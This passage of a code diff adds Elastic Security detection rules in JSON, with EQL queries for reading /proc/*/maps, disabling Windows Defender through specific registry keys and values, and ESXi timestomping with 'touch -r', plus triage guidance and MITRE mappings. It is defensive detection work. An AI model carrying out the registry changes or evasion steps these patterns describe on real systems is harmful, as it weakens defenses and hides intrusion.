guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "2f8a1226-5720-437d-9c20-e0029deb6194_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2f95540c-923e-4f57-9dae-de30169c68b9_1.json b/packages/security_detection_engine/kibana/security_rule/2f95540c-923e-4f57-9dae-de30169c68b9_1.json new file mode 100644 index 00000000000..145fe90ac4a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2f95540c-923e-4f57-9dae-de30169c68b9_1.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for /proc/*/maps file reads. The /proc/*/maps file in Linux provides a memory map for a specific process, detailing the memory segments, permissions, and what files are mapped to these segments. Attackers may read a process's memory map to identify memory addresses for code injection or process hijacking.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious /proc/maps Discovery", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\nprocess.name in (\"cat\", \"grep\") and process.args : \"/proc/*/maps\" and process.entry_leader.name in (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"\n)\n", + "references": [ + "https://github.com/arget13/DDexec" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entry_leader.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2f95540c-923e-4f57-9dae-de30169c68b9", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "2f95540c-923e-4f57-9dae-de30169c68b9_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2f95540c-923e-4f57-9dae-de30169c68b9_2.json b/packages/security_detection_engine/kibana/security_rule/2f95540c-923e-4f57-9dae-de30169c68b9_2.json new file mode 100644 index 00000000000..ca508736468 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2f95540c-923e-4f57-9dae-de30169c68b9_2.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for /proc/*/maps file reads. The /proc/*/maps file in Linux provides a memory map for a specific process, detailing the memory segments, permissions, and what files are mapped to these segments. Attackers may read a process's memory map to identify memory addresses for code injection or process hijacking.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious /proc/maps Discovery", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\nprocess.name in (\"cat\", \"grep\") and process.args : \"/proc/*/maps\" and process.entry_leader.name in (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"\n)\n", + "references": [ + "https://github.com/arget13/DDexec" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entry_leader.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2f95540c-923e-4f57-9dae-de30169c68b9", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "2f95540c-923e-4f57-9dae-de30169c68b9_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_110.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_110.json new file mode 100644 index 00000000000..9390ffde7b2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_110.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the Windows Defender registry settings to disable the service or set the service to be started manually.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Defender Disabled via Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Windows Defender Disabled via Registry Modification\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for configurations that disable Windows Defender or the start of its service.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if this operation was approved and performed according to the organization's change management policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed.\n\n### Related rules\n\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Re-enable Windows Defender and restore the service configurations to automatic start.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n (\n (\n registry.path: (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\"\n ) and\n registry.data.strings: (\"1\", \"0x00000001\")\n ) or\n (\n registry.path: (\n \"HKLM\\\\System\\\\*ControlSet*\\\\Services\\\\WinDefend\\\\Start\",\n \"\\\\REGISTRY\\\\MACHINE\\\\System\\\\*ControlSet*\\\\Services\\\\WinDefend\\\\Start\"\n ) and\n registry.data.strings in (\"3\", \"4\", \"0x00000003\", \"0x00000004\")\n )\n ) and\n\n not\n (\n process.executable : (\n \"?:\\\\WINDOWS\\\\system32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\Security Agent\\\\NTRmv.exe\"\n ) and user.id : \"S-1-5-18\"\n )\n", + "references": [ + "https://thedfirreport.com/2020/12/13/defender-control/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + }, + { + "id": "T1562.006", + "name": "Indicator Blocking", + "reference": "https://attack.mitre.org/techniques/T1562/006/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "2ffa1f1e-b6db-47fa-994b-1512743847eb_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_111.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_111.json new file mode 100644 index 00000000000..daa3d27ad68 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_111.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the Windows Defender registry settings to disable the service or set the service to be started manually.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Defender Disabled via Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Windows Defender Disabled via Registry Modification\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for configurations that disable Windows Defender or the start of its service.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if this operation was approved and performed according to the organization's change management policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed.\n\n### Related rules\n\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Re-enable Windows Defender and restore the service configurations to automatic start.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n (\n (\n registry.path: (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\"\n ) and\n registry.data.strings: (\"1\", \"0x00000001\")\n ) or\n (\n registry.path: (\n \"HKLM\\\\System\\\\*ControlSet*\\\\Services\\\\WinDefend\\\\Start\",\n \"\\\\REGISTRY\\\\MACHINE\\\\System\\\\*ControlSet*\\\\Services\\\\WinDefend\\\\Start\"\n ) and\n registry.data.strings in (\"3\", \"4\", \"0x00000003\", \"0x00000004\")\n )\n ) and\n\n not\n (\n process.executable : (\n \"?:\\\\WINDOWS\\\\system32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\Security Agent\\\\NTRmv.exe\"\n ) and user.id : \"S-1-5-18\"\n )\n", + "references": [ + "https://thedfirreport.com/2020/12/13/defender-control/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + }, + { + "id": "T1562.006", + "name": "Indicator Blocking", + "reference": "https://attack.mitre.org/techniques/T1562/006/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "2ffa1f1e-b6db-47fa-994b-1512743847eb_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_6.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_6.json new file mode 100644 index 00000000000..b98c6b286b0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_6.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where the 'touch' command is executed on a Linux system with the \"-r\" flag, which is used to modify the timestamp of a file based on another file's timestamp. The rule targets specific VM-related paths, such as \"/etc/vmware/\", \"/usr/lib/vmware/\", or \"/vmfs/*\". These paths are associated with VMware virtualization software, and their presence in the touch command arguments may indicate that a threat actor is attempting to tamper with timestamps of VM-related files and configurations on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ESXI Timestomping using Touch Command", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\")\nand process.name : \"touch\" and process.args : \"-r\" and process.args : (\"/etc/vmware/*\", \"/usr/lib/vmware/*\", \"/vmfs/*\")\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "30bfddd7-2954-4c9d-bbc6-19a99ca47e23", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.006", + "name": "Timestomp", + "reference": "https://attack.mitre.org/techniques/T1070/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "30bfddd7-2954-4c9d-bbc6-19a99ca47e23_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_7.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_7.json new file mode 100644 index 00000000000..ee021293cbf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_7.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where the 'touch' command is executed on a Linux system with the \"-r\" flag, which is used to modify the timestamp of a file based on another file's timestamp. The rule targets specific VM-related paths, such as \"/etc/vmware/\", \"/usr/lib/vmware/\", or \"/vmfs/*\". These paths are associated with VMware virtualization software, and their presence in the touch command arguments may indicate that a threat actor is attempting to tamper with timestamps of VM-related files and configurations on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ESXI Timestomping using Touch Command", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name == \"touch\" and process.args == \"-r\" and\nprocess.args : (\"/etc/vmware/*\", \"/usr/lib/vmware/*\", \"/vmfs/*\")\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "30bfddd7-2954-4c9d-bbc6-19a99ca47e23", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.006", + "name": "Timestomp", + "reference": "https://attack.mitre.org/techniques/T1070/006/" + } + 